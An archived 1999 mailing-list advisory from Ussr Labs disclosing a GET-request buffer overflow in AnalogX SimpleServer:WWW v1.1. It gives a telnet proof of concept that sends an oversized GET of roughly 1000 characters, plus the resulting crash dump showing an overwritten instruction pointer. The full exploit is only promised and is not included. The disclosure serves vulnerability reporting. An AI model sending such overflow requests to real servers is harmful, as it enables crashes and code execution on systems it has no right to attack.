mailing list archives
Local / Remote GET Buffer Overflow Vulnerability in AnalogX SimpleServer:WWW HTTP Server v1.1
From: labs () USSRBACK COM (Ussr Labs)
Date: Fri, 31 Dec 1999 05:22:38 -0300
-----BEGIN PGP SIGNED MESSAGE-----
Happy New Year! to All!!
Local / Remote GET Buffer Overflow Vulnerability in AnalogX
SimpleServer:WWW HTTP Server v1.1
USSR Advisory Code: USSR-99029
December 31, 1999 [5/5] (not the original one), original [5/5] will
be released 15/01/1900 :)
AnalogX SimpleServer:WWW HTTP Server v1.1 for Win9x and possibly
About The Software:
Introducing AnalogX SimpleServer:WWW, the first in a series of simple
to use yet
powerful servers! This webserver is SO easy to use, about the only
thing you need
to know how to do is drag and drop files; then just click on the
'Start' button, and
you're webserver is up and running, serving your pages to the world!
SimpleServer:WWW supports MIME file typing, CGI, common log format,
and multi-hosting, just to name a few! If you've always wanted a
easy to use, versatile webserver, then you're prayers have been
UssrLabs found a Local / Remote Buffer overflow, The code that
handles GET commands
has an unchecked buffer that will allow arbitrary code to be executed
if it is overflowed.
Do you do the w00w00?
This advisory also acts as part of w00giving. This is another
to w00giving for all you w00nderful people out there. You do know
w00giving is don't you? http://www.w00w00.org/advisories.html
[hell () imahacker]$ telnet die.communitech.net 80
Connected to die.communitech.net
Escape character is '^]'.
GET (buffer) HTTP/1.1 <enter><enter>
Where [buffer] is aprox. 1000 characters. At his point the server
And in remote machine someone will be see something like this.
HTTP caused an invalid page fault in
module <unknown> at 0000:41414141.
EAX=00afffbc CS=017f EIP=41414141 EFLGS=00010246
EBX=00afffbc SS=0187 ESP=00af0060 EBP=00af0080
ECX=00af0104 DS=0187 ESI=816294f0 FS=0e47
EDX=bff76855 ES=0187 EDI=00af012c GS=0000
Bytes at CS:EIP:
bff76849 00af012c 00afffbc 00af0148 00af0104 00af0238 bff76855
00afffbc 00af0114 bff87fe9 00af012c 00afffbc 00af0148 00af0104
Binary or source for this Exploit (wen we finish it):
Vendor Url: http://www.analogx.com/
Eeye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN, Brock
Tellier, Technotronic and
u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.2 for non-commercial use <http://www.pgp.com>
-----END PGP SIGNATURE-----
- Local / Remote GET Buffer Overflow Vulnerability in AnalogX SimpleServer:WWW HTTP Server v1.1 Ussr Labs (Dec 31)